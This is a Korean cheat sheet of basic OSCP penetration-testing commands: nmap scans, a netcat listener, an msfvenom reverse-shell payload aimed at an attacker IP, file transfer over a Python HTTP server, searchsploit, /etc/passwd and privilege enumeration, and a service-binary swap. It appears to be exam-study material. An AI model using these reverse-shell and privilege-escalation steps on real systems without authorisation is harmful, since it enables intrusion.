OSCP 기본 명령어 모음

NMAP

nmap -sC -sV [TARGET_IP]
  • -sC : 기본 스크립트 사용
  • -sV : 버전 정보 출력
nmap -p- -Pn -T5 [TARGET_IP]
  • -p- : 1~65535까지 모든 포트 스캔
  • -Pn : ICMP가 아닌 다른 방식으로 스캔 시도(윈도 방화벽은 ICMP를 기본 차단하여 다른 방식 사용)
  • -T5 : 가장 빠른 스캔 속도
  • 알려지지 않은 포트(서비스)가 스캔되면 CVE 찾아볼 것
nmap -sU -p161 [TARGET_IP]
  • -sU : UDP scan
  • -p161 : 특정 포트만 스캔(161-SNMP)

대역으로 스캔하면 너무 느림 -> 호스트 단위로, 터미널창 나눠서 할 것


NC

nc -lvnp [my_port]
  • 리스닝 상태로 대기한다
  • 리버스쉘 접속용도로 사용


MSF

  • metasploit framework
  • 리버스쉘 페이로드를 생성할 때 사용
msfvenom --list payload
  • 사용가능한 payload 목록 출력
msfvenom -p windows/x64/shell_reverse_tcp lhost=[My_IP] lport=[1234] -f exe -o sh.exe
  • -p : payload
    • windows/x64/shell_reverse_tcp : 64bit
    • windows/shell_reverse_tcp : 32bit
    • linux/x64/shell_reverse_tcp : 64bit
    • linux/x86/shell_reverse_tcp : 32bit
  • lhost : 공격자 IP
  • lport : 공격자 port
  • -f : 파일 타입 지정(윈도 exe, 리눅스 elf)
  • -o : 저장할 파일명


Python Server

python3 -m http.server 80
  • 실행시킨 위치에서 서버를 열고 대기한다
wget http://[my_ip]/[file_name]
  • python서버에서 파일을 다운로드한다


SUDO

sudo su 와 sudo -i 차이 비교

비교 항목sudo susudo -i
현재 디렉토리실행했던 위치 그대로 유지root의 홈 디렉토리 (/root)로 이동
환경 변수 ($PATH 등)이전 사용자의 환경 변수가 남아있음root의 순수한 환경 변수로 초기화
실제 작동 방식sudo 권한으로 su 명령어를 실행root 계정으로 시뮬레이션 로그인 (login shell)
추천 상황현재 작업 중인 폴더 안에서 권한만 급하게 올릴 때일반적인 모든 루트 작업
  • sudo su (혼합형 권한 상승) : su는 Switch User의 줄임말입니다. sudo su를 입력하면 “sudo 권한을 이용해 root 사용자로 전환하겠다”는 의미
  • sudo -i (완전한 로그인 ) : -i 옵션은 Interactive Login을 의미합니다. 즉, root 계정으로 아예 “새로 로그인”을 하겠다는 의미


SEARCHSPLOIT

searchsploit 키워드
  • os 이름, 버전, 서비스명, cve 번호 등으로 검색
searchsploit -m db_id번호
  • 현재 위치로 익스플로잇 파일을 복사해줌
searchsploit -x db_id번호
  • 주석, 컴파일 방법, 사용법 등 미리보기


LINUX

chmod +x [file_name]
  • 실행권한 추가
mousepad [file_name]
  • 메모장으로 파일 열기
cat /etc/passwd
  • 모든 사용자 열거
  • 로그인 이름 : 암호화된 암호 : UID : GID : 설명 : 홈 폴더 : 로그인 쉘
hostname
  • 호스트네임
cat /etc/issue
cat /etc/os-release
uname -a
  • 운영체제 릴리스 및 버전 정보
ps aux
  • 시스템 프로세스 목록
ip a
ifconfig
  • 네트워크 어댑터의 TCP/IP 구성 확인
routel
  • 네트워크 라우팅 테이블 표시
strings [바이너리파일]
  • 바이너리 파일에서 파일 내에 있는 4글자 이상의 연속된 문자열을 모두 출력
grep -A 10 -i "write" textfile.txt
  • textfile에서 write 가 들어간 문장과 그 아래 10줄을 같이 출력
which unix-check
  • unix-check 파일 위치 찾기


Windows

powershell -exec bypass
  • powershell 실행
whoami /priv
  • 내 권한 확인
move a.exe "c:\program files\ca\b.exe"
  • 파일 이동
net stop [service_name]
net start [service_name]
  • 서비스 중지/시작
shutdown /r /t 0
  • 즉시 재부팅